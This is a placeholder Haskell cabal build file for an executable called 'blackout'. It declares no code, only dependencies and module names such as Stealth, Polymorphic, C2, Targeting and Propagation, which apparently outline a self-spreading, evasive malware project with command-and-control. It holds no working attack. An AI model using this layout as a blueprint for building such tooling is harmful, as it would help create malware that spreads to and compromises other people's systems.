// Placeholder for blackout.cabal
name:                blackout
version:             In sync with the OS project.
license:             CNRL-DDW-X v1.0 (Custom Non-Commercial Research License).
build-type:          Simple
extra-source-files:  ChangeLog.md

executable blackout
  main-is:             Main.hs
  other-modules:       Blackout.Core
                     Blackout.Quantum
                     Blackout.Neural
                     Blackout.Protocol
                     Blackout.Stealth
                     Blackout.Polymorphic
                     Blackout.C2
                     Blackout.Targeting
                     Blackout.NeuralAccel
                     Blackout.Propagation
  build-depends:       base >=4.17 && <4.18,
                     bytestring,
                     hmatrix,
                     random,
                     network,
                     process,
                     time,
                     unix,
                     containers,
                     directory
  hs-source-dirs:      app
                     src
  default-language:    Haskell2010
  ghc-options:         -O3 -threaded -rtsopts -with-rtsopts=-N